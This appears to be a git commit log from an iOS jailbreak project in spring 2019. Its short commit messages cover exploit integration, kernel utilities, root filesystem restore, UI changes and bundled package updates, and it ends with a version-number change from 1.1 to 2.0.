Joonwoo Kim	f5833f28ea	Removed a line of code	2019-05-31 01:02:37 -04:00
Joonwoo Kim	e7bd785a45	Fixed bugs and fonts	2019-05-31 00:36:39 -04:00
Pwn20wnd	a8b1d1c8f0	Update the status correctly	2019-05-30 17:51:26 +03:00
Pwn20wnd	5ebdd99a83	Clean up variable and function namings	2019-05-30 17:12:26 +03:00
Pwn20wnd	02924e0a8d	Update credits	2019-05-30 14:35:19 +03:00
Pwn20wnd	abc7d0e2dc	Make the animations faster	2019-05-30 14:29:21 +03:00
Joonwoo Kim	a4af5f4f89	initial commit for new UI New UI Implemented remove unnecessary xcode ref passes torch Clean up	2019-05-30 14:21:08 +03:00
Pwn20wnd	246f47ff09	Fix false status info	2019-05-28 15:55:51 +03:00
Pwn20wnd	d566c24914	We don't need these just yet	2019-05-28 15:50:39 +03:00
Pwn20wnd	805bae9a6a	Fix a logic bug in root filesystem remount	2019-05-28 15:39:23 +03:00
Pwn20wnd	a16a6ccf39	Use IOMalloc and IOFree for general purpose allocations and make machswap(2) not depend on stealing kernel's creds	2019-05-28 14:30:30 +03:00
Pwn20wnd	9412034c6e	Dynamically retrive the default user ids	2019-05-26 08:42:16 +03:00
Pwn20wnd	2a2d0b7b0b	Add get_path_for_fd	2019-05-25 13:04:20 +03:00
Pwn20wnd	c29bb1d0d2	Dynamically derive the paths for jailbreak files	2019-05-25 10:42:55 +03:00
Pwn20wnd	1a1133c4f3	Fix the check for update button as requested by a Redditor...	2019-05-25 00:04:05 +03:00
Pwn20wnd	5725cd55dd	Add an option to hide the progress hud as requested by a Redditor	2019-05-24 23:41:46 +03:00
Pwn20wnd	e957ee8d0b	Add an option to make the device automatically respring once the jailbreak is completed instead of waiting for the user to tap the OK button as requested by a Redditor	2019-05-24 17:57:51 +03:00
Pwn20wnd	7d59e3c4b1	Fix root filesystem restore on iOS 11	2019-05-24 17:19:21 +03:00
Pwn20wnd	3fc38ccb43	Move this up there	2019-05-22 22:47:29 +03:00
Pwn20wnd	53d22ef49f	Make sure resources are still in the trust cache after bootstrap extraction	2019-05-22 20:39:01 +03:00
Pwn20wnd	3916f6f64f	Fuck that guy :/	2019-05-22 19:32:09 +03:00
Pwn20wnd	40ab52846e	Optimize	2019-05-22 18:35:34 +03:00
Pwn20wnd	050d80d9c7	Update jailbreak-resources	2019-05-22 18:04:00 +03:00
Pwn20wnd	f49c6d5e5f	Use get_kernel_proc_struct_addr in get_kernel_cred_addr	2019-05-20 23:02:51 +03:00
Pwn20wnd	04e48a6d5b	Make these assertions non-fatal	2019-05-20 22:15:26 +03:00
Pwn20wnd	9c920c4ef5	Add enable_mapping_for_library and enable_mapping_for_libraries	2019-05-20 21:46:04 +03:00
Pwn20wnd	e286f0eb88	Make this more clear	2019-05-20 18:25:08 +03:00
Pwn20wnd	0de7551ab2	Update jailbreak-resources	2019-05-20 18:12:48 +03:00
Pwn20wnd	f31b3816aa	Fix kernel utilities	2019-05-20 18:06:00 +03:00
Pwn20wnd	45ba717cc5	Cache the proc struct addr returned from exploits	2019-05-20 17:54:20 +03:00
Pwn20wnd	6e9c817f72	Wait for the app to exit before loading the tweaks	2019-05-20 17:31:01 +03:00
Pwn20wnd	79cbc046aa	Fix the settings tab locking up and not loading	2019-05-19 22:32:10 +03:00
Pwn20wnd	0cc0660343	Update kernel utilities	2019-05-19 21:18:54 +03:00
Pwn20wnd	b1a373bbfc	Fix a stupid warning	2019-05-19 16:59:57 +03:00
Pwn20wnd	952b10720d	canOpen() causes a misleading log to happen	2019-05-19 16:56:10 +03:00
Pwn20wnd	db5b6af977	Rewrite blockDomainWithName and unblockDomainWithName to make them smarter	2019-05-19 16:40:16 +03:00
Pwn20wnd	779d3d7a00	I should really quit using auto	2019-05-19 16:00:31 +03:00
Pwn20wnd	d8872fc87f	Update uikittools	2019-05-19 11:31:54 +03:00
Pwn20wnd	64e3883d13	iOS 11 does not release the extensions unless adding them fail	2019-05-18 22:33:36 +03:00
Pwn20wnd	de3abf9510	Update jailbreak-resources to fix a kernel panic on iOS 11	2019-05-18 22:27:49 +03:00
Pwn20wnd	a573386226	Update the default preferences	2019-05-18 19:35:36 +03:00
Pwn20wnd	91d77d52d0	Fuck this mount point and everything it stands for	2019-05-18 18:20:05 +03:00
Pwn20wnd	4fd316fca6	Fix a possible crash when there is no snapshot in root filesystem restore	2019-05-18 17:26:00 +03:00
Pwn20wnd	7ff6bceaed	Fix running uicache in root filesystem restore and fix the path for the rebranded Electra's bootstrap marker file	2019-05-18 17:14:58 +03:00
Pwn20wnd	19613aedd1	Update mobilesubstrate	2019-05-18 00:46:59 +03:00
Sam Bingner	68342215b8	This should not be in here	2019-05-17 11:12:03 -10:00
Sam Bingner	cea3eaae00	Update bundled packages again	2019-05-17 11:01:22 -10:00
Sam Bingner	fa21ed6490	Fixes for apt-pinning from actual testing	2019-05-17 10:31:01 -10:00
Sam Bingner	a5364aabb5	Error if the apt couldn't start	2019-05-17 10:31:00 -10:00
Sam Bingner	0c8a86d3c0	Update bundled packages	2019-05-17 10:31:00 -10:00
Sam Bingner	6b4bd73aa1	Fix a couple bugs	2019-05-17 10:31:00 -10:00
Sam Bingner	81036fd42e	Begin work to make jailbreak more reliably repairable	2019-05-17 10:31:00 -10:00
Pwn20wnd	f93bc468e9	Make kernel allocations safer	2019-05-17 21:43:15 +03:00
Pwn20wnd	eaf6df4c07	Not sure how this ever actually worked... Whatever, it's fixed now	2019-05-17 17:02:13 +03:00
Pwn20wnd	360b9001a5	Math is weird sometimes	2019-05-17 12:54:33 +03:00
Pwn20wnd	16aa0277fa	Update KernelUtilites	2019-05-17 11:41:49 +03:00
Pwn20wnd	0010f2ed91	Add issue_extension_for_mach_service	2019-05-14 20:33:14 +03:00
Pwn20wnd	bb9471a505	This mistake is so amusing I won't force push to cover it up	2019-05-14 19:37:28 +03:00
Pwn20wnd	75be49f6e1	Move vtable offsets to koffset	2019-05-14 19:01:23 +03:00
Pwn20wnd	b9dcf0ae1b	Workaround an autotype flaw	2019-05-13 23:00:56 +03:00
Pwn20wnd	2a6e61ff42	Make this a macro	2019-05-13 22:14:22 +03:00
Pwn20wnd	b934594eb3	Don't do this	2019-05-13 21:57:50 +03:00
Pwn20wnd	eb8ab29156	Rename kexecute to kexec	2019-05-13 21:36:08 +03:00
Pwn20wnd	447d5c82a3	- Refactor and clean up - Make _assert restore the saved errno - Add unrestrict_process_with_task_port and revalidate_process_with_task_port - Separate the jailbreak and the view controller - Replace free with SafeFree and SafeFreeNULL - Add a progress HUD - Add assert-specific error messages - Run uicache in root filesystem restore	2019-05-13 19:51:41 +03:00
Pwn20wnd	351435fc48	Update jailbreak-resources to fix a possible race condition in unrestrict	2019-04-23 22:03:34 +03:00
Pwn20wnd	0e9b7606ed	Allow specifying the symbol name in FINDOFFSET	2019-04-23 13:22:04 +03:00
Pwn20wnd	e252e46abd	Find proc_find and proc_rele	2019-04-23 12:43:46 +03:00
Pwn20wnd	23bd360096	Add FINDOFFSET	2019-04-22 18:16:55 +03:00
Pwn20wnd	6eb7fa1fc9	Make voucher_swap log to syslog	2019-04-21 11:10:31 +03:00
Pwn20wnd	898880a4b8	Clean up	2019-04-21 00:15:34 +03:00
Pwn20wnd	0de27ce6c6	Add kalloc_crash	2019-04-20 23:57:31 +03:00
Pwn20wnd	de525ccb15	Fix a typo	2019-04-20 14:57:22 +03:00
@@ -1 +1 @@
 .1.1
 .2.0